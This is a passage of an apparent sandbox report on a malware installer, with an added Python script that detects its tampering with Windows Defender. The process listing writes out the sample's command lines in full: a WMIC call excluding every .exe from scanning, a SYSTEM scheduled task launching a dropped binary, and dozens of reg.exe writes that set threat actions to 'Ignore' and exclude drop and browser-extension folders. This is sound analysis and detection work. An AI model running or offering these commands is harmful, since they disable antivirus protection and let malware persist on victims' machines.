PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4580 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
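
The chain in the WriteProcessMemory table above (Install.exe -> forfiles -> cmd -> powershell -> WMIC, then schtasks, then dkBeKWG.exe -> powershell -> cmd/reg.exe) is a Defender-neutering sequence whose command lines are listed in the Processes section below: a WMI call to MSFT_MpPreference adds an exclusion for every .exe, a scheduled task relaunches the dropped binary from Temp as SYSTEM, and reg.exe writes ThreatIDDefaultAction = 6 for a list of threat IDs (6 is "Ignore" in the documented policy values; Set-MpPreference calls the same value "Allow") plus Exclusions\Paths entries for the drop directories, each written under both /reg:32 and /reg:64. The Python below is an added detection example, not part of the sandbox report or of the sample: it parses process command lines for exactly those four patterns and collapses the per-view repeats into what Defender was told to ignore. It also recognizes the sibling Exclusions\Extensions and Exclusions\Processes policy keys, which this sample does not touch. The EVENTS list is constructed from the command lines on this page (the chained REG ADD wrapper is cut to three statements, and reg.exe PIDs are paired with commands illustratively because the table does not record which child wrote which value); the rule names are assumptions of mine.

```python
"""Flag the Defender-tampering command lines recorded in this detonation.

Added example, not sandbox output. EVENTS is constructed from the Processes
section of this report; rule names are mine, not sandbox signatures.
"""
import re
from dataclasses import dataclass

# Remediation codes documented for the policy key Threats\ThreatIDDefaultAction:
# 2 = Quarantine, 3 = Remove, 6 = Ignore (Set-MpPreference calls 6 "Allow").
THREAT_ACTION = {"2": "Quarantine", "3": "Remove", "6": "Ignore/Allow"}

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"

# 'REG ADD "<key>" <opts>' or '"...\reg.exe" ADD "<key>" <opts>'; a ';' ends the
# statement when several are chained inside one powershell "cmd /C ..." wrapper.
RE_REG_ADD = re.compile(r'reg(?:\.exe")?\s+add\s+"([^"]+)"([^;]*)', re.I)
RE_OPT = re.compile(r'/([vdt])\s+(?:"([^"]*)"|(\S+))', re.I)
RE_WMIC_EXCL = re.compile(r"MSFT_MpPreference\s+call\s+Add\s+(\w*Exclusion\w*)=(\S+)", re.I)
RE_FORFILES = re.compile(r'forfiles(?:\.exe)?"?\s.*?/c\s+"?(cmd|powershell)\b', re.I)
RE_TASK_SYSTEM = re.compile(r'schtasks\s.*?/RU\s+"?SYSTEM"?', re.I)


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str      # detection name (assumed, not a sandbox signature)
    subject: str   # threat ID, excluded path/extension, task name or LOLBin
    note: str = ""


def reg_adds(cmdline):
    """Yield (key, value_name, data, view) for every REG ADD in a command line."""
    text = cmdline.replace('\\"', '"')          # undo the wrapper's quote escaping
    for key, opts in RE_REG_ADD.findall(text):
        vals = {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
                for m in RE_OPT.finditer(opts)}
        view = re.search(r"/reg:(32|64)", opts, re.I)
        yield key, vals.get("v"), vals.get("d"), view.group(1) if view else "native"


def analyze(events):
    """events: iterable of (pid, command_line). Returns a list of Finding."""
    findings = []
    for pid, cl in events:
        m = RE_FORFILES.search(cl)
        if m:   # forfiles /c used as a proxy to launch a shell (indirect execution)
            findings.append(Finding(pid, "lolbin_proxy", "forfiles", m.group(1).lower()))
        m = RE_WMIC_EXCL.search(cl)
        if m:   # exclusion added through the Defender WMI provider, not Set-MpPreference
            findings.append(Finding(pid, "defender_exclusion_wmi", f"{m.group(1)}={m.group(2)}"))
        if RE_TASK_SYSTEM.search(cl) and re.search(r"\\Temp\\", cl, re.I):
            tn = re.search(r'/TN\s+"?([^"\s]+)', cl, re.I)
            findings.append(Finding(pid, "system_task_from_temp", tn.group(1) if tn else "?"))
        for key, name, data, view in reg_adds(cl):
            if not key.lower().startswith(DEFENDER_POLICY):
                continue
            leaf = key.rsplit("\\", 1)[-1]
            if leaf.lower() == "threatiddefaultaction":
                label = THREAT_ACTION.get(data, "unknown")
                findings.append(Finding(pid, "threat_action_override", name,
                                        f"{data}={label} view={view}"))
            elif "\\exclusions\\" in key.lower() and leaf.lower() in ("paths", "extensions", "processes"):
                findings.append(Finding(pid, "defender_exclusion_policy", f"{leaf}:{name}",
                                        f"view={view}"))
    return findings


def summarize(findings):
    """Collapse the per-process, per-view repeats into rule -> set of subjects."""
    out = {}
    for f in findings:
        out.setdefault(f.rule, set()).add(f.subject)
    return out


# Constructed from the Processes section; reg.exe PIDs are paired illustratively.
EVENTS = [
    (2828, r'.\Install.exe /AdidysikD "385118" /S'),
    (3508, r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe '
           r'/c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender '
           r'PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"'),
    (956, r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender '
          r'PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True'),
    (1776, r'schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" '
           r'/TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe\" '
           r'Oz /Rhsite_iddhd 385118 /S" /V1 /F'),
    (3376, r'powershell "cmd /C '
           r'REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;'
           r'REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;'
           r'REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;"'),
    (1216, r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64'),
    (3076, r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32'),
]

if __name__ == "__main__":
    for rule, subjects in sorted(summarize(analyze(EVENTS)).items()):
        print(f"{rule:26} {sorted(subjects)}")
```

Run it directly to print the collapsed summary, or feed analyze() a (pid, command_line) iterable exported from Sysmon Event ID 1 or Security 4688 to hunt for the same behaviour on live hosts. Because values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender take precedence over locally configured preferences, a host that produced threat_action_override or defender_exclusion_policy findings needs those registry values removed as part of remediation, not only the dropped files and the scheduled task.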

Processes

C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe\" Oz /Rhsite_iddhd 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe Oz /Rhsite_iddhd 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

